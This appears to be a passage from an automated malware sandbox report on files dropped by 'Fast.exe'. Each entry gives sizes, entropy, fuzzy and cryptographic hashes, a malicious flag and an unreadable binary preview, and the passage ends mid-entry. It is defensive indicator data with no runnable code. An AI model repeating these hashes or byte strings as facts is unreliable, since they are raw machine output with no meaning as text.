    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4368602
    Entropy (8bit):5.717356914764024
    Encrypted:false
    SSDEEP:49152:cC0nNc/RcYHCY9AwqdHIEogMAYrukdUmSC+bXMZQU1QqpdxtRn6FKxyJc:iEIzHIEWOyRnQ6
    MD5:F2C7EEEAC30EC51ED6B96F4CA7692E36
    SHA1:99D26E91677E8AA067F7A31704D893CBBF176192
    SHA-256:51FD1CB859C955C0531FF45674BFECFDEA289B02532BF7C2D7BBBB023B65210E
    SHA-512:89D095559E7E3805366B07A7D779772F5B22A988950F9FC0402A827328C510FA42132D658C802B61C6AA87337BBE94CC83D36D1457E57FE55207A341E97E5ABA
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):27298
    Entropy (8bit):7.992432813605974
    Encrypted:true
    SSDEEP:384:OE9pQZetx09TesvqScO2rL+B8GIxGb2bL5USQlDTM1qu+/F/3MAiof3HcUQSuiaF:7yZe709z0rL+pLbjSV+NPpNHwSMJ
    MD5:87E15AC276662C65A5B4E30CC9EFD010
    SHA1:6BA50DDE19CFF96FB1C7A5CD7BF409683CA8C571
    SHA-256:8A60CFF9131203871AB639159D6247D039E36EA871CF0A5C3D3E28DCCA828DD7
    SHA-512:F7FBF8ADADFF5678B90F9DCE52F5D9B5EF5BEC7B07D9AA93E226208B66A2EF45A4891ACF417936C24D727EACBBCC839071B19D85039D7643014B71EBB6ACEBCA
    Malicious:true
    Preview:.(..uU-.I.......X.Z.#..5.&...._.............j..Teg.s..f.i......@...&../.. .E....Q*.o.y.W.|4.c.C..T.V..J.......~.<....n.{.A.......9C"V......6T..h..V...O54@..B.......$.`{....s..,U.Z.....p.....VC......A%s)H.....R...v.2}..Ys....H....B..0........cF.*..`...&0.O.M.nVZ.q..*.+[."F.....L.=l..M..5..@ E..d...6yA....i.y.{...-9.oJ?i.E...B;(+.....b=.!W...........+1+..2........g...-&..T....gn.Sq.M`...y.......`.(....t._.'..my.z...a.C)..*!.sS...V.^..;Z.4...&`...?.*8...s...q..^'..;..d..B...b.',.a.l...d.e.XpUZ...A.W..[.}.}.......v[}...[}..T...A..%g.....Ba.nKb..!A['..\C)......(..~ ..o.....e*..@.t8...[...u...v>.A.KW..r.a.... ..T.=....tO..-.......X~../G........c\...#..#Xb...;.m.....W8wb..d..h....-S.....F.7...5RG~..O....gLR....(2..F....M4=.......#6^.;..W..L.G.".B..'..f../....6...&..r.m.... B.........x..'^..h+.. ...N.]LV.n7...5.ZD#%..x.8{V...._.QA5pG.^....q:l......*n...u.....G9.%+..7.Qg....Q.k$.%6...znJ....`.....s.-].x....{.W.FV1.U....n..B.e)[.....6.......1.w1.e.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1938
    Entropy (8bit):7.8778717826069595
    Encrypted:false
    SSDEEP:48:0E8i/VBV8XD3lfJrjwliloolOP/jUSJ6RoMT6LQ:XJVBWrTljCFJ6RoMT6LQ
    MD5:046F01031AC7282A1B5EDBA254FA748F
    SHA1:F51EC04A38442C97D72634CA715200695C96DDFF
    SHA-256:789EF998C799DA14F1B8C83CB80800045D61568B7DEFA5B5142BF8B2AA328577
    SHA-512:BC5C03236AEA5AEEAC9A04A1E2A9EF772FBF8F0E9C67F4A66452671FFADA8ED1787DF6F66201C3885CB964A6B888AAF148C60799F44D6DEF50DE3D081566F11D
    Malicious:false
    Preview:k....~...A-~Xo......QO....u.;.........P[.CRg/.6.).....J.6..-.......5.[..{K...K..~....Pm.g?,.P..KH..n.........=.............i.x.&L.k.LM.`$>.....`".{i?.`......h...<...Ss..=E.q.B..L.[al..._..J....E./...G......=a..o.L..l.ef....$.g..[).YX..)......!.eJ....3.?.c.=8u..e .D./..}~4..v).J..C.....3.Bd=e..^..7*.-B2...(.N2|......;...6.i ..Y..t.z.5.F(Uw..J.}....Q=8.|+..<.h.=.L.*.'.6.:.Y....r...7,.......+M[.VO..~....2.9.......t. .A.i.Z...b...zs..&*f.G..6<..0..,.8..-=-.ci..C...~*...;....y<. .o..W.a].L..g....|.S.S.-..:N.'+....h..j.*t.U.B.......WB...{..2.'..L>=...p./[,b.(.)<..N.C..q.H..s.rz....p\4t=H.J....7...a...1&-Xs......|GcK......X*...DS.4.}.......hM.<...l.j8.O...O.X..xRSY.V....=..Lh.^!.....&..7....8.D@s4.V.PD@........1.#......*..<..E...C...29..l..|k_o..j.L..[.wJ....>.D.4?.hx..$..j......4yi...i..^....."9.Wu.`..x....~..\_v..#.<.ZI...."...M15.E....TVA.....;7.".&P...c....b;y.B.eYb.....qS7.#.M..&...:......N>.......Q[...Y..xm.....d.(......2.......6=..q*Vs..pq.I.\..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):60160266
    Entropy (8bit):7.980078261554565
    Encrypted:false
    SSDEEP:1572864:/Qb5m2CYw2bheyHA2DiAaNqCPiQwm9tqGWS15Vj9QVqd2+NAs65:IXhwMhe6AAaPiQwF6xQ22RJ
    MD5:AA62926C7FAA49E853B82305C006C557
    SHA1:6FA9580728A6875B50D83928091C1441EA3D4B36
    SHA-256:5B7297BA0FC2B2356D71DDBE28214EE69C265012A6E053B7E91F417D23864550
    SHA-512:4A8D79906293FF3067AD96B87799642935FE75F55C298D8FB7DFE70366BFCFDFD3884A08BB3C98900D1817A99762EFD61E79201EFB26CFEA6E547EAF8E0EDDC1
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):614866
    Entropy (8bit):7.999659143159799
    Encrypted:true
    SSDEEP:12288:o/EE22OG/ZGVl6V5ctDtRIGygwAPSpzrXQW4+0X2QsN2TbekpVC+:oD2aZwC+M5mSpPgW4XX2pN2h
    MD5:1A4D8859BBAE294D0693381752F05940
    SHA1:504908523B77511AE6C7CA1A1AB2E17320B882C1
    SHA-256:E2FB76A03C2350ACCF4B0F26F5D3C6391EAE9E9D86AA1F1C897D1663FDF53A3B
    SHA-512:4EF8389E4A8B8785354CDD3D1C42C5E8AC28D3B2672AFB94545735CE38C68E35BCE948C62051693B3D251DA47F3149585AB10F18B66B130556C7C8DDD3547944
    Malicious:true
    Preview:.U.j....e...!.T;...d..1H.;.=.Ar.:x5a.T..A.W..J[w..}...g..4.........|Jwk.Pg........}.&...qYoC.#NeG$%..N\.....8.e.(....w..G.h~.....{..0..4.w.T,......~...]l...4./.t|...8.X$.<G...I.[...+..f..........bv_.x.`.i....7.~.S........%"k.......I......5LOQ.........S`H..,...d..$...D.J........K......#.9..>Z.X.......S/.7a......L....30.....tC..v.......\.wf-..d...,..C...........LY-.@w.E..Bw.."6....."....A.~.E....X...#...7..J?.K...(P.,`....T.M.8....%N7.GJ$.......J...S.}8..r\.|^..Te1..}.}l...pD...}p.,A.....y.+.lC..B...m. W............ .'%..%.9..n.....9Qz.'......Ke...r.hF6.q;.Q.ZS..^-.MM.z.y.<f[].3.OW8.t.....6...<<.3...V..(.......iV.>.$n.g1..9..u.i...p..7$8...;..Wh.]....5z.^.r.g..K.=....eJ.R..8..X'Y>|.e].....v...JO$..:.....g......R:4.TF.".?.h.....!.{...i3b&%.U.,.]/...5nAew....].....()...J3V.|....r...1.......).....t...$....r......_...5+.*...o&.+........v.X..........km'..b.k......%....,..1[.R.hF.g3Y.mH....)P..Ck...[x.A......\..F...e..6.q/..F..b.../.\.Q...%.Y..S....8.K.9
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):918770
    Entropy (8bit):7.999826596458451
    Encrypted:true
    SSDEEP:24576:iAn0lz92lkWR30Ev9OJPKNxxrGjbjzYIlLU/weYmw:Bn0ir5vYJPKNx6bjXwIeC
    MD5:43388E83E206C16DD4DCDC063DA19E95
    SHA1:99D06C366727A4B47CC49D1A540633C95D23633B
    SHA-256:F89881790583364752FB4A7A9AC3A6FB75027ACEC9635403EF3970FB952A5F87
    SHA-512:BEBCA69ED4AFACDD8BD92765EC934421487651ACC9B1DF8354D353292B876AC3DB84F82CB5B05951CB6420540ECC593C68EA5E2D69E64DBB0CD0039FFC6B87F3
    Malicious:true
    Preview:)n:.....-.....6P.{:...,..1...[.X.Y'...r.-...z|?yu.:8|.]...3....lZP3....`.q/.^=..I].O.&........Eu.x\.{.6.@..62..K......%.M...b.4..5......5...w......A68..Q.]D..p......C...I.\.A.W......m.....E...A*|j.pS.$..:4.7...&*.....X.......;.h......~|.-..2.'I.......x..9.....#/..P....uZ..1.Y......c.t.J.ea..c2.Pw...49YTd..S.N....N.A(.N...6v.d..@.gF.\2}......=0.Y......8..c.U../`...)TP-....w.H..b.g.....1.s.S.H.....ij...e>:...8..BUE:.\...}e.gj...$.b.ja2!;V.m...$....(.....{..../.....-.n....r.M.Oq......O.?...T`.!.U....n16...i.)......R...5......6.!.M..>U.,v....P...c.E...v7...J.".6..0.R/.iZ.$.qefR......O....a.aR....~..fU.>....E..S8i...2...'.'..........-&XdGP..0)$#.j...R..W......[.3.J.3.'..[{.l.L0T.S/R%.|..g4*...D.MM.n...V..^......O.....c..u.\9=~7m.q0..oZ..]..F..+J3"...5..yV......94N.#...o^......>.....VU.X$....9k\|.W..i..`(Z&.E....Wi..k.2L.B.x;.......8.!...;D.z5.x............TQ}...,.o#....W<.%a>...W.......K.D....(..x....1...U..qDmTn.-...1.....s...1xJ...P
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1224402
    Entropy (8bit):7.999846824472683
    Encrypted:true
    SSDEEP:24576:ZWISuLrInfj5/8aSqe9q1aBUHkry4DTxb6JGRiOTE7vYYf/a:EISuLrIft0aSX9q1aGErTDT8JGRiOEa
    MD5:24C9669A2DE083596D440FA47D408984
    SHA1:95C9A788A25E87810738704AAF7C920F5245D46F
    SHA-256:89F9F88BB30D52A976EF28D28D208025E8506473C0F3118959F5C69C54D5E39D
    SHA-512:3B6FE4DB634DDA79A59E8F2A374BC088B5110298F5B6EAB4DA9E0C70C7877512A6C66590598DC88A4DB5A24295BAFE60264253D74CF0D107BE6523AF7A8DC9DB
    Malicious:true
    Preview:..............l....-&...X..?3.....x~3........4.^.....u...u.."..m....QD..........@O...~...A...}z.A..K.kt..sD.o.e.n<y.'....o.X..]..k.[..Yy......@n....k(.,......OP[........u...i..Mf..f.....y.H.%.......x...../..a..i....m]\2...n.Dy*.A(...{..#g.x.$jo+VJ..9..~,j..i...?.1..4@.*.......e.._G...2.H...v\.T..H.~....!..\..`....sw1.m.VV.U.ni.?.._./..e..%..>u.b...+.-.|.>>..Y..s..T.?..#..P=4o;^......Z<.BJ........I..S.b[. .n...4.....dU.\=T:s...Ve\n.O....~.`.T3...w..R.qoDv.U.'.. ...c.8%....T.{.,u.J.m.p^1^...:.o..<.0..wQ..&]8.}.....F..;..8c..<1IQ.'.m....g..)N..x1x.._.>...#6KH....\..<.B......__9lV...I....V.%,k...H.rWR...V.R.d.o.IM.<......;............7.M59..^s...]3,=..I$U..y...wHP..c1A+5.....T[..s..F.......f.....k.......%.Ml..b7..F.....a.}eN>%.i....'UgR.R......l...%./.r9.V....o.......r....AF...{...{+....pe...X.....m.]X.....%])....w.jiO,.i......[.=.S../..%}G7..B.....DaB..J.Vt....0q..A5........J.U;.@.H.l..I......a.j.*'..LNT..u..k..^..`...+..].VH....*..`Z.. ..~..Z_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11237730
    Entropy (8bit):6.160293658078322
    Encrypted:false
    SSDEEP:196608:RzwSv9AAyNe6liXUxCGZHa93Whlw6ZRnjCGPt:aKlyNTliXUxCGZHa93Whlw6ZRnjH
    MD5:085D5FBBE92527A5E7F357CE2D91087C
    SHA1:AD31C1E2F65B53F9260FFB8F0A993C9A059D7C56
    SHA-256:397DAAA709ABAD0F6FF197760E88EDF134515FA1F7AC54353FCED45E742D6584
    SHA-512:646A6AD48DA115888C59C30BA1C2BE990A03E93A5F7A5FDFCBB78EF7CB6734EF838C413B53812595F70642F4FACB953821C5889EC0FEA29431DA3812E913B54C
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):177411282
    Entropy (8bit):6.6626076835274
    Encrypted:false
    SSDEEP:1572864:NqyTOaliwnJRMpKLDZli4ozxIejTz2u9Mlk/jBfg3GH5gVtTcV:t2JgVKV
    MD5:9FB34F77CE5FC007BB4A5C9F897B2A1B
    SHA1:91AB7D3E6315860D110629AE966C144A256873F4
    SHA-256:711EC6F3816A3E8672A08DB5A582CD472A389586E9B626F30B2EF70423ABA45C
    SHA-512:2B42C2671D3389B35917AA3A4CC208974658B8CACAAE3DE040DB2F712BCC89E60A25D1793D0D6D77DBC80E6235830B9CB63C23E867402555F10CEA64E87958E0
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):341202
    Entropy (8bit):7.99943396361444
    Encrypted:true
    SSDEEP:6144:PaF9nbXoc16zlMPpxQC/1PTv/I6rNbbkWIqGFRqsX/ntnYPemPSZ3ALyfMMxVeMz:PWKYQC/1zf5Hk2GzqytYPemSZQLYP
    MD5:3F83242C1EE95D373622E7EF838BA029
    SHA1:F15346B1716FC184660A01EF2785467609570D33
    SHA-256:DFF8C58EBD1ED388946FC9703531618A678C1EEDB67081FDBA9A67F49D26B287
    SHA-512:8C8F2A5FB281E183247CCFA2C8F0C575E5E43BD74A9D165AC22D73E89A2740ED06778D907085F587019D37924BBACE8F7CD9F0BB79D2C77B4D1B7D4B892E2BAF
    Malicious:true
    Preview:&.e!.p.....e!.......AJWV..!>{....w...:......O$..".|."..>@..T........\....pt<..X.^.2`.W|....0P.&T...;._[.W.IJ........J.....Ed^~Ys...... A..U.k..@g$bv.@,.P.....5c..1.P)4....R..@.`6.E.8..Q..y.Y.g.m.u...Aa....~..).~_..."....b=../9....%.=....S...]L..E..]....y..i.S.}#.|N..d.H.....&tgae.'..J...R.X..w......g.@\..l.hYi.,:....C.....o6..V.qA....s..`C.O.x../....."..'......jK.p..$.....}6.....6Q.v........G..RO.[p%..~.[.+.r..2..!...Xjb....am.......E..xv...ri....Y :4..h...:.F..j..K.....3.d!.xKG.^&.ig}.7.....cT$..auK).>.....C..d..X.1`...".&C....."K.7........E.|..*....~}1........F9..T....S.4;23.7o&k...&n*.Q.........l..f.L...D...'.V.8......}ov/w...a....%n.t.....*...Q.....25...A1.cY.....451.O.wJ.......}.%9.cX......)..7....@l.....hp7.H#~..i...*`.o..k^........,.R..N....zL.X...-r::.2.LvO.P..r}....)....m...9..H.F.+..M.C[Rs:c-.P:a:e.....n.u.b.j.P..O.q.......0.......].".............:'...._b.$G....d.G.Eb.^.g...%...s....a.$@.......`3.H}.......f ../....(
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8207566
    Entropy (8bit):7.651175822415572
    Encrypted:false
    SSDEEP:196608:Qi9AF4cC5G0p3m18orDhYVskrDIleMPXWOM:QU64v8w+BOVskrDlMPXm
    MD5:7DDDE97286A78121EF74A8E23D81DBFA
    SHA1:A46E7377B2D69496AF7A1CDBBD587A61DEC25D29
    SHA-256:B1DEDE3C2643D456D5DFB4CFE722CF7C4770969811CD0D9B6041E9F6ADB1AF75
    SHA-512:578EBB4E94B9C4C109ED33AD489CBAA4BAB914C3A57C2CF685118512969714BCE0F7634E9E46CC4AB88E8FF8A29AF497076ACB4B91F40A2CB8F03B5CD7FBC6C6
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):415394
    Entropy (8bit):7.999609955550204
    Encrypted:true
    SSDEEP:12288:gH1+v/2Zc/qWDuL4GJVqQNQyXJ5EG0IeL8gTOhR0hp:gHwv/2CNKxLL/JXHgI0b
    MD5:F4F51E4BCF3B766A009EDDEED6AD2A1A
    SHA1:B4325BEC63990F836518A5BC641D7E358B8C8F7B
    SHA-256:E7D678FF7DAF9B80F51A0D3081F7462478C91E03241773A5143C6D29E9A05896
    SHA-512:A56A06178662B8FD776E26D2BACDE49895308DD521D4BDE3E8A6B34F0A8CB504F43DCC4B6EF06FF5E67FD85497977AEFBC4227C1FD2CEF0829DDE9F604DF963F
    Malicious:true
    Preview:..fw8s.=.9...).Y.%..1......V([..Z...........-......xq.p.cQ8&6.2....t.f....Q....FJ%4.c..c...........w..w..i..A........K..tI.%.n0...rQWG.@.%.< ....O..X..(L)[2...Z..).>.Z.Mr...nh.....H..@^..q...=..`....`kT."`*r.0.p.HlI.....}S.n.2..A.U......1.... >.!.[...BL...}..sY..l....J....m&Iv0...9..a.#1c.`.....).Z?.Scx.......8...R..M./kTo.......r...G..%.T..WT.;..@...T...!..d..m...2.....}..k.@:N.....s..q.R.|,*..82/;q.%;...=x.#f&.o<...y^D^>\?...uv]M.....V.....Yi...'....z.&..3.E.g1.W}..."5.^V.p.....K.m.W.M+......v.9,0.a-..n.i...V..&X... P...uR...d....:woM.f+..A?.)...+.f*.(.B.;..4.$.rT.....jP.6Y~.A.pfQ......./...\..B..t1...1.*v.H[.L...p.q0[5...(V....C#.....r(....}..v.".rG....J.........*.....V...G..Q..p..u....1....Ey.......f...2"|.....}.`....\.X9..;.y`..$...f.D*.A.I..z'.B......gC..XOId.k.^1....m...%....@./...]{"g.'.. :....g..~.zlL..2.B.D....E..-....6p".F^.\4O......:.#......j......,.3.......[.. .g..!.j+.Vs>F.......dD..8=.lp.N... x]&..........&...3..~`...`...U}
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.987210994193662
    Encrypted:false
    SSDEEP:384:plFYQOOyX36ZHJ+m7FDVjxFTp/xZh9H7Wf3HnnGWbchqQ:RYFX36pJJdhR6f3nGW7Q
    MD5:D0EF47C9477D40CA84DAC3A53AF0174F
    SHA1:B6B80E82FFF69C099E4D6CF59EEB8DCF48423820
    SHA-256:241B805AC6D206D80C4FEAF037382D97584B7A3FFB4F6D44E069E9136F8D0C5E
    SHA-512:91A27F52978A66268A77E3490A0D22D0DE1AEAC5367BD0468C7E7416246A9957FB905272A8BAA58902F91E2A60C07C5B6DE39547869AC4A126EC54DBE414E8F0
    Malicious:false
    Preview:..-.eg"#.......o......).n....P...........$.np..Z.s.3....7...~......+...!.-.j.:......M.d/8.'...>.4..5Y....Z...t.<D.m!;x.S..* ......&..-J.9.p.../f..U.2W........v(..B..*.'.&.B.eO..._k..1...P.-..:.... ....zwY...8~UD.h.f.i#...N.d..0....OB.k..c.LP.K.`......0$.1$y*.g.D..ra..{...Im ..]......f.I.!....V0..U....k#.. .'R$c.....%L..K{.S..%.8".8...:...h.&,.X.<......O...\".f..8:O..B.F........Ug6.....f./. f.<....m......k.=.......(...y..PL.....d...#.../...E....p.r&..#.h.kcP8..q.H..8/....Ktv..+.$.1...:.....I....c....3K..{P.7R.g.R...}m.....<...(....,.5.w.~:.D.:3a.0bK....U].....eA......_.l.......Ff..=....z?.O .1o......]....zCr.o(.s.Wf|.....o..o...\M9.~.cw8.s..........1....M~4S.&...V......"...u.%-..Z..g]k$i.E._.$....%.VP..V;..j.E....x.n.EF[6.@....i..`..8.]A....N.m8V.... .'M";.l%Z....%.^..@....D.....Q.."n&..l.F.)%..);.:.........Z..`.....K...mX/....R.8....Zn..X...~2._k9N.U..P^ .?~..O..i._Hb9d/U.n.0...,.d....>.;.v...z.k5Ol..2....s8b...$..5..`B.....H....CN...Pk..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.986015178008093
    Encrypted:false
    SSDEEP:384:5Q5te64cAtu2WWwaAKtFeY3apJtiHXAqB+DN4neLMNzxQ:mGvcUpWWlyJY3AqB2N4CK1Q
    MD5:F606C1C70D74BDB29160D53E1A099736
    SHA1:ADFA71586655D436D14EE08C09E1A675A5CA9F2E
    SHA-256:0C6629C8E3C7383CE947949418B764807D7D9DDC972223420C82F4CFA37583E3
    SHA-512:FBB6D2E6DB39E5C9B799BA5C2803C751B53EB2394CB7991654B239B7EAB8D6D9B420D53C3B3D1525253181E22D9BD4BE1A2BF96B48C8D4CCEF78AF10AE10B44E
    Malicious:false
    Preview:.3.......B.....k..+t...I....*.D.c.gLM+(....#......v%.i..biv.O..^;.6..*n......s'.<.I...Z.1.<..a.4.|u.E.H......*P..Vz........<.d..3|..>.q4.s..n..].F".;...~....).;..DI[[....A;kT.....b..&1.(..F|D.....Ns.).~.l...0..?..A'..1.w.d.l&J.n.VqI...y.../6zn..^..-1:....x.;.s......2..{.fs..'t..A..{.7.r....`[.B....&.%W..3rf/,._.tg3W...}..[.-..'...(...s.v.{#}....P6.k7.y&.........vr.8.>...4z...j...>.d......H..U.WC...O*KK.#..=2e.i...^F.4.....}.. R3"_......S.".....J.._....z.4~..Fi....f6.79..'.=.$.4.s<....^....<g.n.i#..~D.l..]...9m...6.w.h...GW.. jS5...hq...y .. ....e....r...._@~.!..<..C...o.].e...(L@...!2.*.......(.........U%..Y..0.......t.R.....";.6...bd...7&x+c... u.SO....zw..@.@.R....&.....E.....8...k.Y....<. ..4.4..$R.....e7.....8..Rb...4{o...h..RVX.X.z.o.TM...[......i....k5.K+...G.-)..x.q9..)..(`...S......?..X:...\.W.<?.........9IX...g...Zf;3.&...>d....v...B......k...*:>.u...." D.f.6.CT..*B:M...{jS. .......>S........5.1.....~...r}.Q..........
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):723170
    Entropy (8bit):7.999703103970478
    Encrypted:true
    SSDEEP:12288:JG3I9PZfpQvFHBVG5qeXft27O5GwoEP6pM3hhf+XGS74am8DD:kY9BfWvFmxvtr4wrP6G/4G/K
    MD5:1D04C7A2E9BC10ED54FD23C001EA2748
    SHA1:8E011A1DC618EA7469C32E6843FAFC8EBDB4FD01
    SHA-256:2CC63E29100505C77F9D13BA2EF82151C6E652736C69D71DDF5F4358E4D2E65E
    SHA-512:BD707AB445793897474376FC9506AEE1B014645BF01F41FB495D2796547D0722A17CDBB55C3E23807FF07D7ADAD3C13068E9AAF8D725B5BA9A5F443325685402
    Malicious:true
    Preview:ic.Q.RW.%.A'.z.t.1..M..%.I2.5l.. ...E.....R.....()-.\eg..\i/.J'.<9....a@'G3.'.5k.Z.Dd?.`...?..m+.;....*.....\......_.A.z......\x.I...us...,v..)3.i..5...J............e....ZG..... .y2/a.}.d-....MD.Xp[.@./....g..Q.....d..8...N.....<&........f.!..Qb.)......L.:.. -...0..!.*.xi..mbo..f..O..M.'.{.nK..x..x0.9.".....a..A.ta...B;T....S`...b.1..l..uB..E>.\t..m..=.....S...c.C.5.MB:e;U..s8.....5.}-.th.kk<..Hs...@...,^.2g.D|$.a....L..l.....~rW..!.Fl.Olc 6...h.T&.a.lDk+....c.&Vl....?o8 .a..;.d%...b..)...O*{d.b..j.l!,..?.8.4n..l....@......fm4.}.hO.c.K.....7Y.....J.^ 7b.........}.T..q.i+..[.s].?...]l..L{....C....z.......f&......\ 6..4W...p....:..&..6.L.P."...[Lb....W.}p..Et....E?.5..Nk....[Z.....C.{......c..j.k.G[....9.a.?r.........F..JI......la.s..hU...|.A..."U....jh...%j^.) .]...=.M.ND.W...M.x..:q....p}.M.....2..Ik^.YE..J.6.`.lK..x...(*.1S*..8s)...2.';.|..9.!.X.)B...C...U.W..T..lw.)Qd.W..D.!.0.9.6..y..PC...Z....s.S.f-Ou.|...m..#t..R"9..~.c[p..l|.. .dE.v~.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4989666
    Entropy (8bit):5.951355808114282
    Encrypted:false
    SSDEEP:49152:pZhlPMtYgEMf0i8P/O3O6SQkknVI2EHuhv5UqHI1mbzF7+uMvtcgky7Rrn+QlZO4:jPU7aHA/M8y7RFZOSbwvzpw
    MD5:1453ADF2FD3E7A9E08E841A5A3899AAD
    SHA1:D698BB5BBDA35017D8CD660B0E2013E66C3BA203
    SHA-256:5CF68DE95E6E9176353F7B628309F59E2C78A463F1BB75F8C3F9A3A799519CEA
    SHA-512:86D8F43766E9D67BEC8EDB50CF6D001616CE3A5FE53308A5C59149D7570042E9C460258F49DE29DD3DBA415857E400029131B9A28FF8A9FD891E15FA10204271
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):370
    Entropy (8bit):7.265873434547784
    Encrypted:false
    SSDEEP:6:FIYh1HojIBt+5oa5bh9BwXRtzWizzQtCf1/FKxRdE8dTbw/8HBjeig34emu0/jg:ma1qZ39BiL6iHQCf9FKxpbwaBm39Kjg
    MD5:EB4BC5D351C25E8E860F3C084FCFFBC4
    SHA1:11070B1C393273ABAEA8DFC10B55BE9E41FBE32A
    SHA-256:8C1FE130ED49C63564DA35B6ABA434E4364F9E92B9C3455C0313DB0820AB3066
    SHA-512:A335D14D4977946BE9774492E2F45CFE1700FF684CA392E681188E5643C7B929C83B607D40DCB0CA509FF3331FCED0C04F252233C6053E1052D60A09841C10AC
    Malicious:false
    Preview:..=.hP...r..X....*.T.<?.;8..b.0....M".......:..&v.7..+........dx..nu.h.kOd..R.F.h..h...{..G....E."t....L.Oc].2..+(X.....Ob.....>n...s...i.w..G.P..L......m.......:.g...}...{...........................#..5..U...V.T......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):843986
    Entropy (8bit):7.9997739524845235
    Encrypted:true
    SSDEEP:24576:qB26d605CHBiHMFoeNi65qvwKLTR3PdxQ1tB8aUa0/7LbvWJ03qeddj:mCHBi0oe952DLTtPC8Ra0/3bOJ03qedJ
    MD5:2491C895204107D7F0347F164BB60870
    SHA1:BDF47F8B9CC454AB40DED0EB3ED9A2A18806F2C0
    SHA-256:D37B739027BACB5CD799DB7C927979860B27B8D8F31092C783629CA87C0D635F
    SHA-512:6E0862C2181F046E46248C8677FC77D2229790B8B959A80F685653A20D77F17471383F041DBFD867CF438C398509AF89C8614F23A3530089746B56F77F6448A8
    Malicious:true
    Preview:..m.|..;.....I>.6X.~.6B......j!......i.%...s.IN...y..h{....N......f!t4...5_.*t.u-..D.R.Y..=... ..9.*.i..d.Z...5>..L......*HB09....qG..w...T,I.K:.!.4.5....E..!m..;..Z....yC.D.,.94"W..\.OD.-..W...f.[.......L/.iw.c&..J.z.|b.@'.........s].prn.e...x....[<Ne.HK.(..Um=]<... ...A."p....R...r..3.....a.j...w..r'.G.I......D5e.......:*d.v. _.E\...7.,.jz.T....m...p.n|.... ..J?.k.c-.u..E..<.J...g..M.e.2..H........y'\P 3..v6/.#8......o,.....wX...}^.m...~_.\..)e....E.#s...6..d4..............y....~.>..S....j.#=..u......T#0.o.Y..%$F@y.^...5..V.....".b.%.............[.:.[k....g...K&w...X/7..`..u.$....6b.o.*.......4.\...6M...t.#.*1.5"..QD....a.'p...o.8T..dK....}.1...2.y..........dW.^0..i.G......Y ]...9..b.T..o.R.....<.6..-..m.Z..x._.xJ.-$.......4...........1.tI@. -..\..h.J......:.m.!*d..r1B9g.f...........ITe.%.....Y..Jh...............(..ES.vL/..?......V..(..F...x......u7..(...]..#..L>.:LL....e9z....Y..D.b.I....mz.G|..RDxk(G./.sF..E......A.p ..C$..,
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):63449818
    Entropy (8bit):6.436911847526764
    Encrypted:false
    SSDEEP:393216:8DOG5ixtbHFWDwTvaSngHbDjR0/SSK5wgZox0dVzS3tL19PudDzLF9WoLJO4Nf0x:4ixtbHvCGjMwgoxoHLF9RNybdQeGtE
    MD5:E7A820F0F424F69FAB25F1BCEBB1FF50
    SHA1:C6F954254B89D8036B33FB46B38D9AD671E1A937
    SHA-256:272052D9CE876BE94D1AD3A92EEC7FCA9C92C29B42CCB574A8BC9AFE8053CFF8
    SHA-512:BEA0106E703101EC254F6367BBEF243EF3503DCE03C1C46112002297E2FA8472FBBB8594B3BFB6EE29CBBE6CDE0B56EE43E762947894688AA2539BE8D588865E
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6427866
    Entropy (8bit):5.979429264560192
    Encrypted:false
    SSDEEP:49152:sDpasot2xQevgjCGT7lmPIionqOgB66zVLkVEk3yV07U24GEQTXvnSPgHosyhB8N:r9KXxLk6GEQTXCUKzNDqS7Xnaogowzx
    MD5:7F4272F7CAA5031C4B07D40874E6425B
